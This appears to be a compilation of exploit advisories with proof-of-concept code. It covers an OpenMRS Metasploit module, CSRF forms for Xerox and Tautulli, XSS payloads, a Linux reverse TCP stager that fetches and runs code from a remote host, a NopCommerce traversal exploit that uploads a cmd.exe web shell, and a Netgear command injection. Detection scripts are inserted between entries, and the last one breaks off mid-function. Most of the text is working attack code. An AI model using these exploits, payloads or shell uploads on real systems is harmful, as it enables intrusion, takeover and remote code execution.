
  def exploit
    chk_status = check
    print_status('Target is running OpenMRS') if chk_status == CheckCode::Appears
    unless ((chk_status == CheckCode::Appears || chk_status == CheckCode::Detected) || datastore['ForceExploit'])
      fail_with(Failure::NoTarget, 'Target is not vulnerable')
    end

    cmds = generate_cmdstager(:concat_operator => '&&')
    print_status('Sending payload...')
    cmds.first.split('&&').map { |cmd| execute_command(cmd) }
  end
end
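As an added detection example (not part of the module or this page), the following Python inspects raw HTTP requests the way a reverse proxy or WAF rule would and flags the pattern the module above produces: a POST to an endpoint under /ws/rest/v1/ with an XML content type, whose body carries the `<string>sh</string><string>-c</string>` argument sequence that execute_command builds. The `java.lang.ProcessBuilder` marker is an assumption added as a second heuristic, not something the page states; the sample requests are constructed.

```python
REST_PREFIX = "/ws/rest/v1/"  # endpoint family named in the advisory

# Body indicators: the argv sequence the module builds, plus (assumption, not from the
# page) the JDK class a command-executing gadget chain typically has to name
BODY_MARKERS = (
    "<string>sh</string><string>-c</string>",
    "java.lang.ProcessBuilder",
)

XML_TYPES = ("text/xml", "application/xml")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def assess_request(raw):
    """Return the reasons a request looks like a REST deserialization attempt (empty list = clean)."""
    method, path, headers, body = parse_request(raw)
    reasons = []
    if method != "POST" or REST_PREFIX not in path:
        return reasons
    # The REST module speaks JSON; an XML body on it is the first oddity
    media_type = headers.get("content-type", "").split(";")[0].strip().lower()
    if media_type in XML_TYPES:
        reasons.append("XML body sent to the REST API")
    for marker in BODY_MARKERS:
        if marker in body:
            reasons.append("body contains %r" % marker)
    return reasons


def build_request(path, content_type, body):
    """Assemble a constructed POST request for the samples below."""
    return (
        "POST %s HTTP/1.1\r\nHost: openmrs.example:8081\r\nContent-Type: %s\r\n"
        "Content-Length: %d\r\n\r\n%s" % (path, content_type, len(body), body)
    )


# Constructed samples: a normal JSON concept creation and an XML body carrying the markers
BENIGN = build_request("/ws/rest/v1/concept", "application/json", '{"names":[{"name":"Fever"}]}')
SUSPECT = build_request(
    "/openmrs/ws/rest/v1/concept", "text/xml",
    "<root><string>sh</string><string>-c</string><string>id</string></root>",
)

if __name__ == "__main__":
    for label, raw in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, assess_request(raw) or "clean")
```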

Xerox AltaLink C8035 Printer Cross Site Request Forgery


The Xerox AltaLink C8035 Printer suffers from a cross site request forgery vulnerability.


MD5 | 6689468b94a86a3ce33b1643d02a6fa7

# Exploit Title: Xerox AltaLink C8035 Printer - Cross-Site Request Forgery (Add Admin)
# Date: 2018-12-17
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.xerox.com/
# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/altalink-c8000-series
# Software : Xerox Printer
# Product Version: AltaLink C8035
# Vulnerability Type : Cross-Site Request Forgery (Add Admin)
# Vulnerability : Cross-Site Request Forgery
# CVE : CVE-2019-19832

# Description :

A CSRF vulnerability was discovered in the AltaLink C8035 model of Xerox printer hardware.
A request to add users is made from the Device User Database form field. This request is captured
with a proxy, and a CSRF PoC HTML file is prepared from it. Xerox AltaLink C8035 printers allow CSRF:
a request to add users is made from the Device User Database form field to the xerox.set URI.
(The frmUserName value must have a unique name.)


# HTTP POST Request :

POST /dummypost/xerox.set HTTP/1.1
Host: 158.162.130.37
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 707
Origin: https://158.162.130.37
Connection: close
Referer: https://158.162.130.37/properties/authentication/UserEdit.php?nav_point_key=10
Cookie: PHPSESSID=fd93756986787a2e338da8eae1ff2ef4; statusSelected=n1; statusNumNodes=8; CERT_INFO=8738a6169beda5f6cc754db4fc40ad63; propSelected=n59; propHierarchy=00000001000000000000000010010; LastPage=/properties/authentication/UserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp
Upgrade-Insecure-Requests: 1

NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3F&isRoles=True&isPassword=True&isCreate=True&rolesStr=6%2C1%2C2&limited=0&oid=0&minLength=1&maxLength=63&isFriendlyNameDisallowed=TRUE&isUserNameDisallowed=TRUE&isNumberRequired=&CSRFToken=34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a&currentPage=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10&_fun_function=HTTP_Set_User_Edit_fn&frmFriendlyName=Ismail+Tasdelen&frmUserName=ismailtasdelen&frmNewPassword=Test1234%21&frmRetypePassword=Test1234%21&frmOldPassword=undefined&SaveURL=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10

# CSRF PoC HTML :

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://158.162.130.37/dummypost/xerox.set" method="POST">
<input type="hidden" name="NextPage" value="/properties/authentication/UserManager.php?" />
<input type="hidden" name="isRoles" value="True" />
<input type="hidden" name="isPassword" value="True" />
<input type="hidden" name="isCreate" value="True" />
<input type="hidden" name="rolesStr" value="6,1,2" />
<input type="hidden" name="limited" value="0" />
<input type="hidden" name="oid" value="0" />
<input type="hidden" name="minLength" value="1" />
<input type="hidden" name="maxLength" value="63" />
<input type="hidden" name="isFriendlyNameDisallowed" value="TRUE" />
<input type="hidden" name="isUserNameDisallowed" value="TRUE" />
<input type="hidden" name="isNumberRequired" value="" />
<input type="hidden" name="CSRFToken" value="34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a" />
<input type="hidden" name="currentPage" value="/properties/authentication/UserEdit.php?nav_point_key=10" />
<input type="hidden" name="_fun_function" value="HTTP_Set_User_Edit_fn" />
<input type="hidden" name="frmFriendlyName" value="Ismail Tasdelen" />
<input type="hidden" name="frmUserName" value="ismailtasdelen" />
<input type="hidden" name="frmNewPassword" value="Test1234!" />
<input type="hidden" name="frmRetypePassword" value="Test1234!" />
<input type="hidden" name="frmOldPassword" value="undefined" />
<input type="hidden" name="SaveURL" value="/properties/authentication/UserEdit.php?nav_point_key=10" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Tautulli 2.1.9 Cross Site Request Forgery


Tautulli version 2.1.9 suffers from a cross site request forgery vulnerability.


MD5 | 83ae455879cfd946e48758d964304d3b

# Exploit Title: Tautulli v2.1.9 - Cross-Site Request Forgery (ShutDown)
# Date: 2018-12-17
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://tautulli.com/
# Software : https://github.com/Tautulli/Tautulli
# Product Version: v2.1.9
# Platform: Windows 10 (10.0.18362)
# Python Version: 2.7.11 (v2.7.11:6d1b6a68f775, Dec 5 2015, 20:40:30) [MSC v.1500 64 bit (AMD64)]
# Vulnerability Type : Cross-Site Request Forgery (ShutDown)
# Vulnerability : Cross-Site Request Forgery
# CVE : CVE-2019-19833

# Description :

In version v2.1.9 of Tautulli, it has been discovered that anonymous access can be
achieved in installations that do not have a user login area, and that the remote
media server can be shut down.

# Python Script :

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests

icon = """
_____ __ _ _ _____ _ _ _ _ _ _ _ ___ __ ___
|_ _/ \| || |_ _| || | | | | | | | \ / (_ | / |/ _ \
| || /\ | \/ | | | | \/ | |_| |_| | `\ V /'/ /__`7 |\__ /
|_||_||_|\__/ |_| \__/|___|___|_| \_/ |___\/ |_\//_/
Unauthenticated Remote Code Execution
by Ismail Tasdelen
"""

print(icon)

# read the host and port as plain strings on Python 2 as well (input() would eval them)
try:
    input = raw_input
except NameError:
    pass

host = input("[+] HOST: ")
port = input("[+] PORT: ")

response = requests.get("http://" + host + ":" + port + "/" + "shutdown")  # You can also run the restart and update_check commands.

if response.status_code == 200:
    print('[✓] Success!')
else:
    print('[✗] Unsuccessful!')

# HTTP GET Request :

GET /shutdown HTTP/1.1
Host: XXX.XXX.XXX.XXX:8181
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://XXX.XXX.XXX.XXX:8181/home
Upgrade-Insecure-Requests: 1

# CSRF PoC HTML :

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://XXX.XXX.XXX.XXX:8181/shutdown">
<input type="submit" value="Submit request" />
</form>
</body>
</html>


Serv-U FTP Server 15.1.7 Cross Site Scripting


Serv-U FTP Server version 15.1.7 suffers from a persistent cross site scripting vulnerability leveraging the Email parameter.


MD5 | 514d8ebc96f062a481bd19ea5e4b5040

# Exploit Title: Stored Cross-Site Scripting
# Date: 16/12/2019
# Exploit Author: Cyb0r9
# Vendor Homepage: https://www.serv-u.com/
# Software Link: https://www.serv-u.com/downloads
# Version: SOLARWIND Serv-U FTP Server v15.1.7
# Tested on: Windows 10 x64
# CVE : CVE-2019-19829

# Overview

The application is vulnerable to a stored XSS vulnerability.

Vulnerable parameter : Email

The Email parameter lacks input validation, allowing JavaScript code to be inserted and
executed in the context of the user's browser session, either when the victim logs in to
the web client or browses to the Serv-U server login page.

A privileged user could manipulate the affected parameter on an existing
user's account so that JavaScript is executed in the client's browser when
the victim logs into their account.

For example, a successful XSS attack could result in the attacker
redirecting the user to a phishing/malicious site or performing actions as
the victim on the Serv-U application.

** Injection Point in user properties **

* Email

# Proof of concept

1) Login as a user that has privileges to create or modify users.

2) Create a new user and add the following payload into the "Email" parameter.

Payload used : "'/><script>alert(7);</script>@gmail.com"'/></script><script>;alert(7);</script>

3) Login as the victim user and observe popup alert.

Zendesk SweetHawk Survey 1.6 Cross Site Scripting


Zendesk SweetHawk Survey version 1.6 suffers from a persistent cross site scripting vulnerability.


MD5 | c93c55f5716c37b650b5788261cdc004

# Exploit Title: Zendesk App SweetHawk Survey 1.6 - Persistent Cross-Site Scripting
# Date: 2019-12-17
# Exploit Author: MTK
# Vendor Homepage: https://sweethawk.co/zendesk/survey-app
# Software Link: https://www.zendesk.com/apps/support/survey/
# Version: Up to v1.6
# Tested on: Zendesk - Firefox/Windows

# Software description:
# Sweet Hawk Survey app ask customers for a 0-10 score instead of the normal good or bad question.
# You can get more granular satisfaction data without compromising the response rate.
# Ask an optional NPS question on the landing page. View reports and drill down into the response
# detail and go directly to the ticket. Easy to set up, just replace the survey place holder in
# your trigger or automation. Customize the landing pages for each of your brands.

# Technical Details & Impact:
# Attackers use vulnerable web pages to inject malicious code and have it stored on the web server
# for later use. The payload is automatically served to users who browse web pages and executed in
# their context. Thus, the victims do not need to click on a malicious link to run the payload.
# All they have to do is visit a vulnerable web page.

# POC

1. Open a support ticket in Zendesk and send an XSS payload, e.g.:
<script>alert(1);</script>
2. Generate a survey request to rate the ticket and the payload will execute.

# Time line
09-19-2019 - Vulnerability discovered
09-20-2019 - Vendor contacted
12-02-2019 - Detailed report shared and full disclosure time line given with no response
12-17-2019 - Full Disclosure

Linux/x64 Reverse TCP Stager Shellcode


188 bytes small Linux/x64 reverse TCP stager shellcode.


MD5 | 140e35142f4d23741799a818d695e97f

;# Title: Linux/x64 - Reverse TCP Stager Shellcode (188 bytes)
;# Date: 2019-12-16
;# Author: Lee Mazzoleni
;# Tested on: Ubuntu 18.04.2 LTS
; reverse tcp stager - download and execute up to 4096 bytes of additional payload - no null bytes in this
; this code is 188 bytes total (less if you delete the exit() syscall at the end)

global _start

section .text
_start:

;// =================>
;// HEAP ALLOCATION =>
;// =================>
xor rax, rax
mov al, 6
mov cl, 2
imul ax, cx ;// int brk()
xor rdi, rdi
syscall ;// brk()
xor rax, rax
mov al, 2
mov cl, 6
imul ax, cx
xor rdi, rdi
mov dil, 128
imul di, 32
syscall ;// brk(0x1000) - 4096 bytes
xchg rcx, rax ;// save addr of our allocated memory in rcx

;//=======================>
;// MAP HEAP PERMISSIONS =>
;//=======================>
xor rax, rax
mov al, 9
xchg rdi, rcx
xor rsi, rsi
mov sil, 128
imul si, 32
xor rdx, rdx
mov dl, 0x7
xor r10, r10
mov r10b, 0x21
xor r9, r9
mov r8, -1
syscall ;// mmap(addr, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, -1, 0)
mov r9, rax ;// save heap address in r9

;// ===================>
;// SOCKET CONNECTION =>
;// ===================>
xor rax, rax
mov al, 41 ;// int socket()
xor rdi, rdi
inc rdi
inc rdi ;// AF_INET
xor rsi, rsi
inc rsi ;// SOCK_STREAM
xor rdx, rdx
mov dl, 6 ;// IPPROTO_TCP
syscall ;// socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
push rax
pop rdi ;// save the socket's fd in rdi for connect() to use

xor rax, rax
push rax
mov dword [rsp-4], 0x2a37a8c0 ;// 192.168.55.42
mov word [rsp-6], 0xbb01 ;// port 443 in lil' endian
sub rsp, 6
push word 0x2

xor rax, rax
mov al, 42 ;// int connect()
mov rsi, rsp
xor rdx, rdx
mov dl, 16
syscall ;// connect(3, {sa_family=AF_INET, sin_port=htons(443), sin_addr=inet_addr("192.168.55.42")}, 16)

;// ====================================>
;// READ CODE FROM SOCKET FD INTO HEAP =>
;// ====================================>
mov rsi, r9 ;// heap addr still saved in r9
xor rdx, rdx
mov dl, 41 ;// CHANGE THIS NUMBER TO SUIT THE SIZE OF YOUR PAYLOAD (41-byte payload used in testing)
xor rax, rax
syscall ;// read(3, heap_addr, SIZE)

;// =================>
;// CLOSE SOCKET FD =>
;// =================>
xor rax, rax
mov al, 3
syscall ;// close(3)

jmp r9 ;// jmp to the heap address in r9 and execute the downloaded payload

;// =========>
;// EXIT(0) => this bit is unnecessary if your payload already calls exit()
;// =========>
xor rax, rax
mov al, 60
xor rdi, rdi
syscall


; ===============>
; ===== Usage ===>
; ===============>
; =========================================================================================
; this program downloads a secondary payload from a remote host, and executes it.
; in this example, the payload used will be a simple hello-world-like program (hello.asm):
; =========================================================================================
; global _start
; section .text
; _start:
; mov rax, 1
; mov rdi, 1
; mov rsi, 0x0a21216f6c6c6548 ; "Hello!!\n"
; push rsi
; mov rsi, rsp
; mov rdx, 8
; syscall
; mov rax, 60
; xor rdi, rdi
; syscall
; =========================================================================================
; 1.) compile your payload:
; -----------------------------------------------------------------------------------------
; nasm -f elf64 hello.asm -o hello.o && ld hello.o -o hello && rm hello.o
; =========================================================================================
; 2.) retrieve the opcodes for the payload:
; -----------------------------------------------------------------------------------------
; objdump -d hello|grep -v '^$\|start>\|file format\|Disassembly'|cut -d'' -f2-9|sed -E "s/\ [0-9a-f]{6}://g"|grep -Eo '[a-f0-9]{2}'|tr -d '\n' ; echo
; b801000000bf0100000048be48656c6c6f21210a564889e6ba080000000f05b83c0000004831ff0f05
; =========================================================================================
; 3.) count how many bytes are in your payload (41 bytes) and update line 86 (the "mov dl, 41" in the READ section above) to reflect this:
; -----------------------------------------------------------------------------------------
; echo b801000000bf0100000048be48656c6c6f21210a564889e6ba080000000f05b83c0000004831ff0f05|grep -Eo '[a-f0-9]{2}'|wc -l
; 41
; =========================================================================================
; 4.) decode the bytes into raw form and serve it via netcat listener:
; -----------------------------------------------------------------------------------------
; echo -n b801000000bf0100000048be48656c6c6f21210a564889e6ba080000000f05b83c0000004831ff0f05 | xxd -r -p > payload
; nc -lvp 443 < payload
; listening on [any] 443 ...
; =========================================================================================
; 5.) one last step before compiling this stager, add your own IP address to line 69 (the "mov dword [rsp-4], 0x2a37a8c0" in the SOCKET CONNECTION section):
; -----------------------------------------------------------------------------------------
; import struct, socket
; print(hex(struct.unpack('<L', socket.inet_aton('192.168.55.42'))[0]))
; 0x2a37a8c0
; =========================================================================================
; 6.) compile and run this shellcode - it will connect to your netcat listener, download & exec the raw payload
; -----------------------------------------------------------------------------------------
; nasm -f elf64 stager.asm -o stager.o && ld stager.o -o stager && rm stager.o
; ./stager
; Hello!!
; =========================================================================================


; Raw paste:
; 4831c0b006b102660fafc14831ff0f054831c0b002b106660fafc14831ff40b780666bff200f0548914831c0b0094887f94831f640b680666bf6204831d2b2074d31d241b2214d31c949c7c0ffffffff0f054989c14831c0b0294831ff48ffc748ffc74831f648ffc64831d2b2060f05505f4831c050c74424fcc0a8372a66c74424fa01bb4883ec06666a024831c0b02a4889e64831d2b2100f054c89ce4831d2b2294831c00f054831c0b0030f0541ffe14831c0b03c4831ff0f05
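An added triage example (my code, not part of the advisory): given a captured copy of this stager it recovers the C2 address, port and expected second-stage size by matching the instruction encodings from the listing above. The helper names are mine; the only input is the raw paste.

```python
import re
import struct
from ipaddress import IPv4Address

# The 188-byte stager as pasted above ("Raw paste"), used here as the sample under analysis.
STAGER_HEX = (
    "4831c0b006b102660fafc14831ff0f054831c0b002b106660fafc14831ff40b780666bff200f05"
    "48914831c0b0094887f94831f640b680666bf6204831d2b2074d31d241b2214d31c949c7c0ffffffff"
    "0f054989c14831c0b0294831ff48ffc748ffc74831f648ffc64831d2b2060f05505f4831c050"
    "c74424fcc0a8372a66c74424fa01bb4883ec06666a024831c0b02a4889e64831d2b2100f054c89ce"
    "4831d2b2294831c00f054831c0b0030f0541ffe14831c0b03c4831ff0f05"
)

# Encodings taken from the listing: the stager writes sin_addr and sin_port as immediates
# onto the stack, already in network byte order, so no byte swapping is needed.
IP_RE = re.compile(rb"\xc7\x44\x24\xfc(.{4})", re.DOTALL)        # mov dword [rsp-4], imm32
PORT_RE = re.compile(rb"\x66\xc7\x44\x24\xfa(.{2})", re.DOTALL)  # mov word  [rsp-6], imm16
# xor rdx,rdx ; mov dl, N ; xor rax,rax ; syscall  ->  read(fd, heap, N)
READ_RE = re.compile(rb"\x48\x31\xd2\xb2(.)\x48\x31\xc0\x0f\x05", re.DOTALL)

def extract_stager_iocs(blob):
    """Return {'c2_ip', 'c2_port', 'stage_len'} for a blob holding this stager, else None."""
    ip_m, port_m = IP_RE.search(blob), PORT_RE.search(blob)
    if not (ip_m and port_m):
        return None
    read_m = READ_RE.search(blob, port_m.end())   # the read() follows connect() in the listing
    return {
        "c2_ip": str(IPv4Address(ip_m.group(1))),
        "c2_port": struct.unpack(">H", port_m.group(1))[0],
        "stage_len": read_m.group(1)[0] if read_m else None,
    }

def scan_hex_sample(hexdata):
    """Convenience wrapper for hex dumps such as the raw paste above."""
    return extract_stager_iocs(bytes.fromhex(hexdata))

if __name__ == "__main__":
    print(scan_hex_sample(STAGER_HEX))   # {'c2_ip': '192.168.55.42', 'c2_port': 443, 'stage_len': 41}
```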

NopCommerce 4.2.0 Privilege Escalation


NopCommerce version 4.2.0 suffers from a privilege escalation vulnerability.


MD5 | 7c639c33b2a7376e378510e29b7b1747

# Vulnerability Title: NopCommerce 4.2.0 -  Privilege Escalation
# Author: Alessandro Magnosi (d3adc0de)
# Date: 2019-07-07
# Vendor Homepage: https://www.nopcommerce.com/
# Software Link : https://www.nopcommerce.com/
# Tested Version: 4.2.0
# Vulnerability Type: Privilege Escalation
# Tested on OS: Windows 10, CentOS, Docker
# Exploit designed for: NopCommerce 4.2.0 on IIS

import requests
import argparse
from bs4 import BeautifulSoup
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import warnings
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')

def proxy(flag):
    return {"http" : "http://127.0.0.1:9090", "https" : "http://127.0.0.1:9090"} if flag else None

def geturl(baseurl, type):
    if type == "login":
        return baseurl + "/login"
    elif type == "mv":
        return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=RENAMEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2fCommon%2f&n=Common2"
    elif type == "mkdir":
        return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=CREATEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2f&n=Common"
    elif type == "put":
        return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=UPLOAD"
    elif type == "contactus":
        return baseurl + "/contactus"
    else:
        return ""

def login(email, password, url, proxy):
    res = requests.get(geturl(url, "login"), proxies=proxy, verify=False, allow_redirects=False)
    cookie = res.cookies.get_dict()
    soup = BeautifulSoup(res.text, features="html.parser")
    token = soup.find("input", {"name":"__RequestVerificationToken"})["value"]
    res = requests.post(geturl(url, "login"), cookies=cookie, data={"Email":email, "Password":password, "__RequestVerificationToken":token, "RememberMe":"false"}, proxies=proxy, verify=False, allow_redirects=False)
    cookies = res.cookies.get_dict()
    return { **cookies, **cookie }

def shellupload(email, password, url, proxy):
    print("[+] Trying uploading shell from")
    cookies = login(email, password, url, proxy)
    # Rename Common Directory
    requests.get(geturl(url, "mv"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
    # Create Common Directory
    requests.get(geturl(url, "mkdir"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
    # Upload File into Common
    requests.post(geturl(url, "put"), headers={"Content-Type" : "multipart/form-data; boundary=---------------------------3125261928760" ,"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, data="-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nupload\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"method\"\r\n\r\najax\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"d\"\r\n\r\n/images/uploaded/../../../../../../../../../../inetpub/wwwroot/nopcommerce/Views/Common/\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"files[]\"; filename=\"ContactUs.cshtml\"\r\nContent-Type: image/png\r\n\r\n@using System\r\n@using System.Diagnostics\r\n\r\n@{ \r\n ViewData[\"Title\"] = \"MVC Sh3ll Windows\";\r\n var result = \"\";\r\n var cmd = Context.Request.Query[\"cmd\"];\r\n if (!String.IsNullOrEmpty(cmd)){\r\n result = Bash(cmd);\r\n }\r\n\r\n if (String.IsNullOrEmpty(result)){\r\n result = \"Invalid command or something didn't work\";\r\n }\r\n\r\n}\r\n\r\n@functions{\r\n public static string Bash (string cmd)\r\n {\r\n var result = \"\";\r\n var escapedArgs = cmd.Replace(\"\\\"\", \"\\\\\\\"\");\r\n var process = new Process()\r\n {\r\n StartInfo = new ProcessStartInfo\r\n {\r\n FileName = \"cmd.exe\",\r\n Arguments = $\"/C \\\"{escapedArgs}\\\"\",\r\n RedirectStandardOutput = true,\r\n UseShellExecute = false,\r\n CreateNoWindow = true,\r\n }\r\n };\r\n\r\n process.Start();\r\n result = process.StandardOutput.ReadToEnd();\r\n process.WaitForExit();\r\n\r\n return result;\r\n }\r\n}\r\n\r\n\r\n\r\n<script\r\n src=\"https://code.jquery.com/jquery-3.2.1.min.js\"\r\n integrity=\"sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4=\"\r\n crossorigin=\"anonymous\"></script>\r\n<script>\r\n$(function() {\r\n var cmdResult = $(\"#cmdResult\");\r\n\r\n\tconsole.log(cmdResult);\r\n\r\n\tif (cmdResult.text() === \"Invalid command or something didn't work\"){\r\n\t console.log(\"should change text\");\r\n cmdResult.css(\"color\", \"red\");\r\n\t}\r\n\t\r\n\tvar term = $(\"#console\");\r\n $(\"#cmd\").focus();\r\n\tterm.scrollTop(term.prop(\"scrollHeight\"));\r\n\t\r\n\t$.urlParam = function(name){\r\n var results = new RegExp('[\\?&]' + name + '=([^&#]*)').exec(window.location.href);\r\n if (results==null){\r\n return null;\r\n }\r\n else{\r\n return decodeURI(results[1]) || 0;\r\n }\r\n }\r\n\r\n\t\r\n\tfunction executeCmd(){\r\n var cmd = encodeURIComponent($(\"#cmd\").val());\r\n\t var currentCmd = $.urlParam('cmd');\r\n\t console.log(\"should replace: \" + currentCmd + \" WITH: \" + cmd);\r\n\r\n\t var currentUrl = location.href;\r\n\r\n\t var paramDelimeter = \"\";\r\n\t if (currentUrl.indexOf(\"?\") < 0){\r\n\t paramDelimeter = \"?\";\r\n\t } else {\r\n\t paramDelimeter = \"&\";\r\n\t }\r\n \r\n\t if (currentUrl.indexOf(\"cmd=\") < 0){\r\n currentUrl = location.href + paramDelimeter + \"cmd=\";\r\n\t }\r\n\t\r\n var newUrl = currentUrl.replace(/cmd=.*/, \"cmd=\"+cmd);\r\n window.location.href = newUrl;\r\n\r\n\t //console.log(newUrl);\r\n\t}\r\n\t\r\n $(\"#submitCommand\").click(function(){\r\n\t executeCmd();\r\n\t})\r\n\r\n\t$(\"#cmd\").keypress(function (e) {\r\n\t if (e.which == 13) {\r\n\t executeCmd();\r\n\t return false;\r\n\t }\r\n\t});\r\n\r\n\t$(\"#cmd\").on(\"change paste keyup\", function(theVal){\r\n\t var cmd = $(\"#cmd\").val();\r\n\t $(\"#cmdInput\").text(cmd);\r\n\t});\r\n});\r\n\r\n</script>\r\n\r\n\r\n<h3>@ViewData[\"Title\"].</h3>\r\n<h4>@ViewData[\"Message\"]</h4>\r\n<h4>Output for:> <span style=\"font-fami
    # Test if it is working
    res = requests.get(geturl(url, "contactus"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
    soup = BeautifulSoup(res.text, features="html.parser")
    test = soup.find("span", {"id" : "cmdResult"})
    if test is None:
        print("[-] Maybe the target is not vulnerable, or you need to restart the appliance")
    else:
        print("[+] Shell uploaded under contact us page")

def main():
    parser = argparse.ArgumentParser(description='Upload a shell in NopCommerce')
    parser.add_argument(
        '-e', '--email', required=True, type=str, help='Username')
    parser.add_argument(
        '-p', '--password', required=True, type=str, help='Password')
    parser.add_argument(
        '-u', '--url', required=True, type=str, help='Base Url of NopCommerce')
    parser.add_argument(
        '-x', '--proxy', required=False, action="store_true", help='Proxy (for debugging)')

    args = parser.parse_args()

    shellupload(args.email, args.password, args.url, proxy(args.proxy))

if __name__ == '__main__':
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    main()

Netgear R6400 Remote Code Execution


Netgear R6400 suffers from a remote code execution vulnerability.


MD5 | c60d99db4805cfbda0c14ac139d7217d

# Exploit Title: Netgear R6400 - Remote Code Execution
# Date: 2019-12-14
# Exploit Author: Kevin Randall
# CVE: CVE-2016-6277
# Vendor Homepage: https://www.netgear.com/
# Category: Hardware
# Version: V1.0.7.2_1.1.93

# PoC

#!/usr/bin/python

import urllib2

IP_ADDR = "192.168.1.1"
PROTOCOL = "http://"
DIRECTORY = "/cgi-bin/;"
CMD = "date"
FULL_URL = PROTOCOL + IP_ADDR + DIRECTORY + CMD

req = urllib2.Request(url = FULL_URL)
response = urllib2.urlopen(req)
commandoutput = response.read()
spl_word = "}"
formattedoutput = commandoutput
result = formattedoutput.rpartition(spl_word)[2]
print result
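An added detection example, not from either advisory: it scans constructed access-log lines for the RoxyFileman `d` directory traversal that the NopCommerce exploit above sends with RENAMEDIR, CREATEDIR and UPLOAD, and for the `/cgi-bin/;` command-injection request shape the Netgear PoC uses. The log layout and helper names are assumptions.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed common-log-style lines (assumed layout: src - - [time] "METHOD target proto" status).
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Dec/2019:10:01:02 +0000] "GET /Admin/RoxyFileman/ProcessRequest?a=RENAMEDIR'
    '&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce'
    '%2fViews%2fCommon%2f&n=Common2 HTTP/1.1" 200',
    '10.0.0.6 - - [14/Dec/2019:10:01:05 +0000] "GET /Admin/RoxyFileman/ProcessRequest?a=CREATEDIR'
    '&d=%2fimages%2fuploaded%2f&n=banners HTTP/1.1" 200',
    '10.0.0.7 - - [14/Dec/2019:10:02:00 +0000] "GET /cgi-bin/;date HTTP/1.1" 200',
    '10.0.0.8 - - [14/Dec/2019:10:02:30 +0000] "GET /contactus HTTP/1.1" 200',
]

LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})')
ROXY_PATH = "/admin/roxyfileman/processrequest"   # compared case-insensitively
ROXY_ROOT = "/images/uploaded"                     # the uploads root RoxyFileman is meant to stay inside

def roxy_traversal(target):
    """Normalised `d` directory if a RoxyFileman request escapes the uploads root, else None."""
    parts = urlsplit(target)
    if parts.path.lower() != ROXY_PATH:
        return None
    d = unquote(parse_qs(parts.query).get("d", [""])[0])   # second unquote catches double encoding
    norm = posixpath.normpath("/" + d.lstrip("/"))          # collapses the ../ chain past the root
    return None if norm == ROXY_ROOT or norm.startswith(ROXY_ROOT + "/") else norm

def cgi_injection(target):
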